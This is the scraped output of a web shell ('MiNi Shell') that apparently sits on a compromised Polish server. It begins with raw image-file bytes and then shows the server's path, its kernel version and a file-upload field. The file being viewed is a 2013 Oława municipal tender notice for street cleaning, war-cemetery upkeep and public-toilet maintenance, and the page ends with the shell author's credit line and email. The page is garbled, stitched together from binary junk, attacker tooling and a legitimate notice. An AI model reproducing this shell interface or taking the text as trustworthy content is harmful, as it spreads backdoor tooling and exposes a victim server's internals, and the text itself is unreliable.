JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130617/113495-N-2013.html

<p class="kh_header"><b>Oława: UTRZYMYWANIE PORZĄDKU I CZYSTOŚCI NA PODWÓRKACH, PLACACH, CHODNIKACH, CIĄGACH  PIESZYCH, 
 PRZYSTANKACH KOMUNIKACJI MIEJSKIEJ, NA TERENIE CMENTARZA WOJENNEGO 
     ORAZ UTRZYMYWANIE SZALETU MIEJSKIEGO</b><br>
<b>Numer ogłoszenia: 113495 - 2013; data zamieszczenia: 17.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Oława , Plac Zamkowy 15, 55-200 Oława, woj. dolnośląskie, tel. 71 303 55 01, faks 71 303 55 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.olawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMYWANIE PORZĄDKU I CZYSTOŚCI NA PODWÓRKACH, PLACACH, CHODNIKACH, CIĄGACH  PIESZYCH, 
 PRZYSTANKACH KOMUNIKACJI MIEJSKIEJ, NA TERENIE CMENTARZA WOJENNEGO 
     ORAZ UTRZYMYWANIE SZALETU MIEJSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Do obowiązków wykonawcy należy:

I.		Tereny zielone -stanowią ok. 30 % powierzchni określonej w załączniku nr 4
1.Koszenie w okresie wegetacyjnym - częstotliwość koszenia winna być dostosowana do warunków wzrostu trawy co najmniej jeden raz w miesiącu tak, aby jej wysokość nie przekraczała 10 cm. 
2.Przycinka, formowanie żywopłotów oraz krzewów zdobnych w okresie od maja do września winno być dokonywane jeden raz w miesiącu zgodnie ze sztuką ogrodniczą. Równolegle z przycinką żywopłotów i formowaniem krzewów ozdobnych należy usuwać samosiejki drzew i krzewów. 

3.W okresie od maja do września należy co najmniej raz w miesiącu dokonywać plewienia klombów i usuwania chwastów z obrębu żywopłotów i krzewów ozdobnych.

4.Dodatkowe usuwanie liści i owoców w okresie intensywnego ich opadania oraz po opadnięciu.
5.Równocześnie z koszeniem, formowaniem i przycinką żywopłotów i krzewów ozdobnych należy niezwłocznie (nie później niż w ciągu trzech dni) usunąć skoszoną trawę oraz pozostałości po formowaniu, przycince i plewieniu.
6.Bieżące utrzymanie porządku i czystości na terenach zielonych polegające na zbieraniu, usuwaniu wszelkich zanieczyszczeń i odpadów, jak również opróżnianie koszy znajdujących się na terenach zielonych według ustalonej częstotliwości (załączniku nr 4- częstotliwość sprzątania w tygodniu).
II. 	Tereny utwardzone  - stanowią ok. 70% powierzchni określonej w załączniku nr 4
1.Bieżące utrzymanie czystości, zbieranie pojedynczych zanieczyszczeń i zamiatanie) z ustaloną częstotliwością (załącznik nr 4 tabela - częstotliwość sprzątania w tygodniu)
2.Likwidacja chwastów narastających na chodnikach, parkingach, ciągach pieszo-jezdnych i innych utwardzonych
3.Zimowe utrzymanie - usuwanie śniegu i zwalczanie śliskości na ciągach pieszych, pieszo - jezdnych, chodnikach i przystankach komunikacji miejskiej niezwłocznie nie później niż w przeciągu 4 godzin od wystąpienia zjawiska bądź w godzinach wczesnorannych w przypadku ich wystąpienia w godzinach wieczornych bądź nocnych, a także usuwanie materiałów do zwalczania śliskości po ustąpieniu warunków zimowych (środki do zwalczania śliskości dostarcza wykonawca).
4.Przystanki komunikacyjne - częstotliwość sprzątania 3 razy w tygodniu (poniedziałek, środa piątek), bieżące usuwanie plakatów, ogłoszeń z wiat przystankowych oraz mycie szyb w wiatach minimum 1 raz w kwartale. Wykaz wiat przystankowych i przystanków komunikacji stanowi załącznik nr 5

III.	Dodatkowe porządkowanie na zlecenie terenów wskazanych przez zamawiającego 			(zbieranie zanieczyszczeń i porządkowanie terenów rekreacyjnych po imprezach masowych 		i innych w razie potrzeby). Orientacyjna ilość takich zdarzeń - 6 w ciągu jednego roku w 		tym powierzchnie do sprzątania do 1ha - 3 zdarzenia w ciągu roku, powierzchnie do 			sprzątania do 0,5 ha - 3 zdarzenia w ciągu roku.
Uwagi:
1.Do obowiązków wykonawcy należy przenoszenie odpadów gabarytowych znajdujących się na nieruchomości w pobliże kontenera oraz niezwłoczne zgłoszenia do Referatu Gospodarki Komunalnej i Ochrony Środowiska w Urzędzie Miejskim takie sytuacji.
2.Usługobiorca zobowiązany jest postępować z odpadami powstałymi (zebranymi) z terenów objętych umową zgodne z ustawą o utrzymaniu porządku i czystości w gminach oraz regulaminem utrzymania porządku i czystości.
IV. 	Utrzymanie cmentarza wojennego w Oławie przy ul. Zwierzynieckiej 5 obejmujące:
1.Koszenie i grabienie trawników oraz terenów zielonych przy mogiłach winno 	być dostosowane do warunków wzrostu trawy, tak, aby jej wysokość nie 	przekraczała 10 cm jednak nie rzadziej niż jeden raz w miesiącu.
2.Przycinka, formowanie żywopłotów oraz krzewów zdobnych w okresie od maja 	do września winna być dokonywana jeden raz w miesiącu zgodnie ze sztuką 	ogrodniczą. Równolegle z przycinką żywopłotów i forowaniem krzewów 	ozdobnych należy usuwać samosiejki drzew i krzewów. 
3.Pielenie i zamiatanie alejek oraz alei głównej co najmniej jeden raz w miesiącu ,
4.Odchwaszczanie i utrzymanie mogił w należytej czystości,
5.Nasadzenie i pielęgnacja kwiatów sezonowych w gazonach przed pomnikiem,
6.Ustawienie zniczy przy pomniku zlokalizowanym na cmentarzu wojennym przed 	dniem 9-go maja, 1-go listopada i Świętami Bożego Narodzenia,
7.Wykonywanie innych zadań wynikających z bieżących potrzeb.
8.Każdorazowe wykonanie usługi należy zgłosić do Referatu Gospodarki 	Komunalnej i Ochrony Środowiska

Ogólna powierzchnia cmentarza wojennego wynosi 0,7393 ha, z czego tereny do koszenia stanowią około 70%. Pozostałe 30% do pielenia i zamiatania.
V. 	Utrzymanie szaletu miejskiego przy ul. Kościelnej w Oławie poprzez:.
1.Nieodpłatne udostępnianie obiektu w godzinach: dni powszednie od poniedziałku do piątku 10:00-18:00. Soboty, niedziele i święta w okresie: maj, - październik godz. 10:00-18:00 natomiast w pozostałych miesiącach od 10:00-14:00
2.Sprawowanie stałego nadzoru w godzinach udostępniania pomieszczeń szaletu.
3.Przeprowadzanie na własny koszt drobnych napraw i remontów typu: malowanie sufitów wewnątrz obiektu raz w roku, naprawa zamków i wymiana szyb okiennych, żarówek w razie konieczności, usuwanie usterek urządzeń sanitarnych i sieci wodno - kanalizacyjnej w obrębie obiektu, 
4.Zapewnienie odpowiedniej ilości środków higieniczno - sanitarnych, drobnego sprzętu typu kubły na odpadki, worki, miotły, wiadra itp. 
5.Utrzymywanie pomieszczeń szaletu oraz urządzeń w nich znajdujących się w należytych warunkach sanitarno - higienicznych poprzez codzienne zmywanie przy użyciu środków dezynfekujących podłóg, urządzeń sanitarnych, a raz na 2 tygodnie mycie ścian i drzwi wewnątrz obiektu, 
6.Dbanie o porządek w bezpośrednim sąsiedztwie tj. 2 m od ścian obiektu poprzez zamiatanie i usuwanie narastającej roślinności.
7.Utylizacja odpadów winna zostać przeprowadzona na koszt wykonawcy
W obiekcie znajdują się następujące urządzenia sanitarne:
	3 muszle klozetowe, 3 pisuary, 2 umywalki, 2 baterie, 2 elektryczne przepływowe 	podgrzewacze wody. Obiekt jest ogrzewany grzejnikami elektrycznymi.
	Kubatura obiektu ok.75 m3 (5m x 5m x 3m), pomieszczenia szaletu wykafelkowane od 	podłogi po sufit.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 77.31.20.00-0, 90.51.13.00-5, 77.34.20.00-9, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 5 000 PLN
Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3) gwarancjach bankowych
4) gwarancjach ubezpieczeniowych
5)poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 pkt.2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz.1158 , z późn. zm.).
Wadium wnosi się przed upływem terminu składania ofert.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujące konto zamawiającego:
       Bank Spółdzielczy w Oławie nr 92 95850007 0010 0016 7716 0030.
      Na poleceniu przelewu należy umieścić adnotacje - Wadium - przetarg - 
      Utrzymywanie porządku.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
2.Klauzule możliwych zmian w umowie ( art.144 ust.1 uPzp):
 - zmiana wynagrodzenia Wykonawcy wskutek zmiany obowiązującej stawki VAT. Wynagrodzenie wykonawcy zostanie zmienione proporcjonalnie do wielkości ustawowej zmiany stawki podatku VAT na usługi będące przedmiotem zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.olawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Oławie, 55-200 Oława, pl. Zamkowy 15, pok.5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 12:00, miejsce: Urząd Miejski w Oławie, 55-200 Oława, pl. Zamkowy 15, pok.14 ( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 20.07.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com